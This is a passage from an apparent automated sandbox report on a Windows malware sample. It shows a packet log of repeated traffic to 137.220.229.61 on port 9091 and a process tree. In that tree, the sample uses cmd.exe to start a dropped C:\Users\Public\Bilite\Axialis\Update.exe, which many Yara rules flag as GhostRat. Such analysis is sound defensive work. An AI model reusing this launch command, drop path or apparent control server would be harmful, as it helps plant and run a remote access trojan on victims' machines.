                                                                                              Jan 4, 2025 14:48:54.127497911 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127507925 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127510071 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127531052 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127762079 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127773046 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127782106 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127804041 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127829075 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.127958059 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127969027 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.127978086 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128001928 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.128098011 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128108025 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128138065 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.128216028 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128226995 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128237963 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128253937 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.128264904 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.128276110 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.129019976 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129060984 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.129128933 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129137039 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129147053 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129158020 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129168034 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.129190922 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.129221916 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.130067110 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130076885 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130086899 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130096912 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130106926 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130129099 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.130160093 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.130944967 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130979061 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130986929 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.130994081 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.131000996 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.131010056 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.131042957 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.132149935 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132165909 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132177114 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132194996 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.132203102 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132209063 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132282019 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.132906914 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132916927 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132925987 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132936954 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.132953882 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.132981062 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.341739893 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341753960 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341763973 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341773987 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341815948 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.341845036 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341847897 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.341861963 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341872931 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341882944 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341892958 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341902018 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341909885 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.341912031 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.341927052 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.341949940 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342099905 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342109919 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342119932 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342148066 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342159986 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342164040 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342175007 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342174053 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342202902 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342786074 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342833996 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342844963 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342855930 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342865944 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342886925 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342940092 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.342986107 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.342997074 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343123913 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.343815088 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343826056 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343836069 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343852997 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343862057 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.343864918 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343873978 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.343889952 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.343902111 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.344898939 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344909906 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344926119 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344932079 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344942093 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344952106 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.344968081 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.344995022 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.345640898 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345659971 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345669031 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345679045 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345706940 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.345732927 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.345743895 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345755100 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345767021 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.345781088 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.346661091 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346673012 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346690893 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346699953 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.346703053 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346714973 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346726894 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.346729994 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.346761942 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.347727060 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.347738028 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.347748041 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.347758055 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.347769022 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.347784042 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.347821951 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.348510027 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.348527908 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.348545074 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.348558903 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.348561049 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.348570108 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.348592043 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.349406004 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349438906 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349482059 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.349522114 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349533081 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349543095 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349556923 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349566936 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.349572897 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.349612951 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.350439072 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.350476980 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.350492954 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.350503922 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.350512981 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.350531101 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.350564003 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.351417065 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.351453066 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.351459026 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.351488113 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.351499081 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.351509094 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.351524115 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.351556063 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.352402925 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.352416992 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.352427959 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.352438927 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.352452993 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.352477074 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.353316069 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.353327036 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.353338957 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.353351116 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.353358030 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.353362083 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.353375912 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.353410006 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.354201078 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.354218006 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.354259014 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.432341099 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432352066 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432363033 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432372093 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432384014 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432398081 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.432399035 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.432425022 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.432436943 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.556545019 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556581974 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556593895 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556605101 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556617022 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556627035 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556638956 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556649923 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556672096 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.556710958 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.556726933 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556737900 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556744099 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556752920 CET909153816137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:54.556768894 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:54.556791067 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:55.602216005 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:55.607095957 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:48:55.607202053 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:48:57.570367098 CET538169091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:00.799948931 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:00.804789066 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:00.804804087 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:00.804816008 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:00.804886103 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:01.111509085 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:01.111746073 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:01.116578102 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:11.554837942 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:11.559590101 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:11.860512972 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:11.914063931 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:11.933573008 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:11.938539028 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:27.617522955 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:27.622421980 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:27.923638105 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:27.976602077 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:28.259026051 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:28.263972998 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:44.007951975 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:44.013021946 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:44.313946009 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:49:44.367253065 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:44.383272886 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:49:44.388189077 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:00.195548058 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:00.200601101 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:00.563298941 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:00.617255926 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:00.627787113 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:00.632602930 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:16.945668936 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:16.950552940 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:17.366136074 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:17.414170027 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:17.439631939 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:17.444469929 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:32.711210012 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:32.716135979 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:33.017203093 CET909153836137.220.229.61192.168.2.4
                                                                                              Jan 4, 2025 14:50:33.070432901 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:33.081271887 CET538369091192.168.2.4137.220.229.61
                                                                                              Jan 4, 2025 14:50:33.086083889 CET909153836137.220.229.61192.168.2.4
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 4, 2025 14:47:50.921052933 CET53572511.1.1.1192.168.2.4

                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:08:47:29
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Uulw5M1DfU.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:67'003'808 bytes
                                                                                              MD5 hash:F889FE126788FFBAFC2E0CD5E233FEE9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:08:47:37
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              Imagebase:0x240000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:08:47:37
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:08:47:37
                                                                                              Start date:04/01/2025
                                                                                              Path:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                              Imagebase:0x6e0000
                                                                                              File size:395'368 bytes
                                                                                              MD5 hash:FB325C945A08D06FE91681179BDCCC66
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
